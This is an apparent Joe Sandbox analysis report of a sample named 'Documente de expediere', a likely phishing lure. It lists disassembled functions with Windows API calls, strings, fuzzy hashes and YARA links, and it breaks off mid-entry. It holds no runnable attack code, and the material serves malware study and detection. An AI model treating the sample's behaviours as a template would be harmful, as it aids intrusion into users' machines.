                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                • String ID: 0$F
                                                • API String ID: 176399719-3044882817
                                                • Opcode ID: b0dfcb79e077460b672bc9503e3d6e343bba0139e08e2787470ac4154cc04800
                                                • Instruction ID: 448b7e932611ade45d4922e36dda1b5f7e0c512ccbb746056d471ef9a5493cf9
                                                • Opcode Fuzzy Hash: b0dfcb79e077460b672bc9503e3d6e343bba0139e08e2787470ac4154cc04800
                                                • Instruction Fuzzy Hash: 86415874A00245EFDB14DF68D884EDABBFAFF49310F148029ED55973A0D739A960CB94
                                                Function 0071772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007177CD
                                                • CreateCompatibleDC.GDI32(00000000), ref: 007177D4
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007177E7
                                                • SelectObject.GDI32(00000000,00000000), ref: 007177EF
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007177FA
                                                • DeleteDC.GDI32(00000000), ref: 00717803
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0071780D
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00717821
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0071782D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: 2323d8a338cb204d327e89ce75df15406ad0d1e1e6cc757f9c193e8de5ea12b2
                                                • Instruction ID: 9790a317536074295ec4a0ac15aa8979892c1087fc8d425f9c622ba230fe4535
                                                • Opcode Fuzzy Hash: 2323d8a338cb204d327e89ce75df15406ad0d1e1e6cc757f9c193e8de5ea12b2
                                                • Instruction Fuzzy Hash: F8316C31105219BBDF159FA8DC09FDA3B79EF09721F118224FA15A61E0C739D861DBA8
                                                Function 006B7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006B707B
                                                  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
                                                • __gmtime64_s.LIBCMT ref: 006B7114
                                                • __gmtime64_s.LIBCMT ref: 006B714A
                                                • __gmtime64_s.LIBCMT ref: 006B7167
                                                • __allrem.LIBCMT ref: 006B71BD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B71D9
                                                • __allrem.LIBCMT ref: 006B71F0
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B720E
                                                • __allrem.LIBCMT ref: 006B7225
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B7243
                                                • __invoke_watson.LIBCMT ref: 006B72B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                • Instruction ID: 3fb368e48253ce19883de08d2e633aa0aa079eda2af269bc1c731919869c0ec2
                                                • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                • Instruction Fuzzy Hash: 4D71B8F1A04716ABD714AE79CC41BEAB3BAEF94324F14422EF514E7381E770DA808794
                                                Function 006F2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006F2A31
                                                • GetMenuItemInfoW.USER32(00756890,000000FF,00000000,00000030), ref: 006F2A92
                                                • SetMenuItemInfoW.USER32(00756890,00000004,00000000,00000030), ref: 006F2AC8
                                                • Sleep.KERNEL32(000001F4), ref: 006F2ADA
                                                • GetMenuItemCount.USER32(?), ref: 006F2B1E
                                                • GetMenuItemID.USER32(?,00000000), ref: 006F2B3A
                                                • GetMenuItemID.USER32(?,-00000001), ref: 006F2B64
                                                • GetMenuItemID.USER32(?,?), ref: 006F2BA9
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006F2BEF
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2C03
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2C24
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 1c70e53bdca3c9193144dd2234207e2fdb84f8286256dce70d52792e72ba496e
                                                • Instruction ID: 4ff6fe0d0f0cf69fce10c3093fb83c3a88d5e6a237f35e03a482186255b2b79f
                                                • Opcode Fuzzy Hash: 1c70e53bdca3c9193144dd2234207e2fdb84f8286256dce70d52792e72ba496e
                                                • Instruction Fuzzy Hash: 8261AFB090024EAFDB21CF64C8A8DFE7BBAFB01308F144459EA41A7291D735AD55DF21
                                                Function 00717192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00717214
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00717217
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0071723B
                                                • _memset.LIBCMT ref: 0071724C
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0071725E
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007172D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: b113f049a9bd1eb9930011f4b9292499f71f012f69057fc1b04d170c8781190b
                                                • Instruction ID: 91c5a1011f8aa6406ba57fffc2e1eb217a5ffc07055ba04c4295493043a24021
                                                • Opcode Fuzzy Hash: b113f049a9bd1eb9930011f4b9292499f71f012f69057fc1b04d170c8781190b
                                                • Instruction Fuzzy Hash: C0618A71A00248AFDB10DFA8CC81EEE77F9EB09710F104159FA14A72E1C778AE85DB60
                                                Function 006E710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006E7135
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 006E718E
                                                • VariantInit.OLEAUT32(?), ref: 006E71A0
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 006E71C0
                                                • VariantCopy.OLEAUT32(?,?), ref: 006E7213
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 006E7227
                                                • VariantClear.OLEAUT32(?), ref: 006E723C
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 006E7249
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E7252
                                                • VariantClear.OLEAUT32(?), ref: 006E7264
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E726F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 462767fa1dbecab26f7837f4bbb592aa0522a7da17bc852369c7914be33e96db
                                                • Instruction ID: c944421db154992343b5175bafedee21b987ed7d6b524ee0f5a9f1a90ae2bfb8
                                                • Opcode Fuzzy Hash: 462767fa1dbecab26f7837f4bbb592aa0522a7da17bc852369c7914be33e96db
                                                • Instruction Fuzzy Hash: 4A415135904259AFCF00DFA9DC449EEBBB9FF08354F00C069F915A7261DB34AA45CB94
                                                Function 007086D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • CoInitialize.OLE32 ref: 00708718
                                                • CoUninitialize.OLE32 ref: 00708723
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00722BEC,?), ref: 00708783
                                                • IIDFromString.OLE32(?,?), ref: 007087F6
                                                • VariantInit.OLEAUT32(?), ref: 00708890
                                                • VariantClear.OLEAUT32(?), ref: 007088F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: cddd4b53318ff4abfb3da0026e28caa89b11601a3b0a48c13734b5b8441088f6
                                                • Instruction ID: 72d7dcebd113f22007c55816c835aa2a8984a3fd622ee46d2722c1f2cd1171e0
                                                • Opcode Fuzzy Hash: cddd4b53318ff4abfb3da0026e28caa89b11601a3b0a48c13734b5b8441088f6
                                                • Instruction Fuzzy Hash: 9B616970608701EFD750DF64C888B6ABBE8AF48714F148A1DF9859B2D1CB78E944CB97
                                                Function 00705A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00705AA6
                                                • inet_addr.WSOCK32(?,?,?), ref: 00705AEB
                                                • gethostbyname.WSOCK32(?), ref: 00705AF7
                                                • IcmpCreateFile.IPHLPAPI ref: 00705B05
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00705B75
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00705B8B
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00705C00
                                                • WSACleanup.WSOCK32 ref: 00705C06
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: a4f6010f7481b3cdc2cc1421a6a2dc0d143cb314116f2ef3a91a4c3680efcd81
                                                • Instruction ID: 68a8f9c823e0156e4d008ae36f838717ea2cde1ab48618633c8d56d1551264cd
                                                • Opcode Fuzzy Hash: a4f6010f7481b3cdc2cc1421a6a2dc0d143cb314116f2ef3a91a4c3680efcd81
                                                • Instruction Fuzzy Hash: F2516B71604700EFDB119F28CC45B6ABBE5EB44710F148A29F956DB2E1DB78E8008F59
                                                Function 006FB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FB73B
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006FB7B1
                                                • GetLastError.KERNEL32 ref: 006FB7BB
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 006FB828
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 1dcba59df83dd1ded05d4ab1d78db2fc69fbcc498198df384a8ad3a604ee95ef
                                                • Instruction ID: c069e1003da32aded34d96e729d404af95c0fe2a89590622de172fbdfe9376e2
                                                • Opcode Fuzzy Hash: 1dcba59df83dd1ded05d4ab1d78db2fc69fbcc498198df384a8ad3a604ee95ef
                                                • Instruction Fuzzy Hash: A6319275A4020DAFDB00FF68C885AFEBBBAEF84740F148029E616D7291DB759942C751
                                                Function 006E9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006E94F6
                                                • GetDlgCtrlID.USER32 ref: 006E9501
                                                • GetParent.USER32 ref: 006E951D
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 006E9520
                                                • GetDlgCtrlID.USER32(?), ref: 006E9529
                                                • GetParent.USER32(?), ref: 006E9545
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 006E9548
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: c057b42b68efba2a648565f1d64239ce50cbe81b7cee01407e6a611a42437764
                                                • Instruction ID: ecc2175719b152feef2b38dd003ce7c10d836ec2b5dad4c48527e8823c2a1825
                                                • Opcode Fuzzy Hash: c057b42b68efba2a648565f1d64239ce50cbe81b7cee01407e6a611a42437764
                                                • Instruction Fuzzy Hash: B321F470901304BBCF01AB65CC85DFEBB7AEF45310F108119F922972E1DB795919DB24
                                                Function 006E955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006E95DF
                                                • GetDlgCtrlID.USER32 ref: 006E95EA
                                                • GetParent.USER32 ref: 006E9606
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 006E9609
                                                • GetDlgCtrlID.USER32(?), ref: 006E9612
                                                • GetParent.USER32(?), ref: 006E962E
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 006E9631
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: cd2fe146cfcc3b7fe77138798f8ef8a628185da8f079124a6d1caba3a3867091
                                                • Instruction ID: 498894e64ac4e851df1d70b413a2d571350520c51ed1cff6d22426aea92af9a2
                                                • Opcode Fuzzy Hash: cd2fe146cfcc3b7fe77138798f8ef8a628185da8f079124a6d1caba3a3867091
                                                • Instruction Fuzzy Hash: D721B374901344BBDF01EB65CC85EFEBB7AEF48300F10805AF921972E1DB7999199B24
                                                Function 006E9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32 ref: 006E9651
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 006E9666
                                                • _wcscmp.LIBCMT ref: 006E9678
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006E96F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1704125052-3381328864
                                                • Opcode ID: 746f38c45cf6dd5d4645fa70104bbc84b255a063823644c8377bea56b6b1e1e5
                                                • Instruction ID: ed9328d20297e38e2fd7ec1c93b41d400ba2203a05c5dd0c8e797e3017ab7375
                                                • Opcode Fuzzy Hash: 746f38c45cf6dd5d4645fa70104bbc84b255a063823644c8377bea56b6b1e1e5
                                                • Instruction Fuzzy Hash: 1B112CB6249357BAFB112626DC07DE7B79E8F04360F30402BFA00A51D1FF9559514A6C
                                                Function 006F4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __swprintf.LIBCMT ref: 006F419D
                                                • __swprintf.LIBCMT ref: 006F41AA
                                                  • Part of subcall function 006B38D8: __woutput_l.LIBCMT ref: 006B3931
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 006F41D4
                                                • LoadResource.KERNEL32(?,00000000), ref: 006F41E0
                                                • LockResource.KERNEL32(00000000), ref: 006F41ED
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 006F420D
                                                • LoadResource.KERNEL32(?,00000000), ref: 006F421F
                                                • SizeofResource.KERNEL32(?,00000000), ref: 006F422E
                                                • LockResource.KERNEL32(?), ref: 006F423A
                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006F429B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                • String ID:
                                                • API String ID: 1433390588-0
                                                • Opcode ID: f622cfab551e4742ffd5ee181e7d78275006e09220b889588bce65e5512b1247
                                                • Instruction ID: 8673a0d7a7d81c4a387a9fccbf71008a358d400253ac19e677bd72510bffdfff
                                                • Opcode Fuzzy Hash: f622cfab551e4742ffd5ee181e7d78275006e09220b889588bce65e5512b1247
                                                • Instruction Fuzzy Hash: 96317EB160521AABDB119F64EC44AFF7BAAFF08301F008535FA05D2650EB74DA61CBA4
                                                Function 006F16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 006F1700
                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F1714
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 006F171B
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0778,?,00000001), ref: 006F172A
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006F173C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0778,?,00000001), ref: 006F1755
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0778,?,00000001), ref: 006F1767
                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F17AC
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F17C1
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0778,?,00000001), ref: 006F17CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: 4bac9a40ceb4371e8c5f9de824b3dbd24aa74a389eef22ce4481c593f27caa47
                                                • Instruction ID: fe8d83015db0a08a0ffec26f687d6eaa32e84cb385a82adb399863cd0af2d3cd
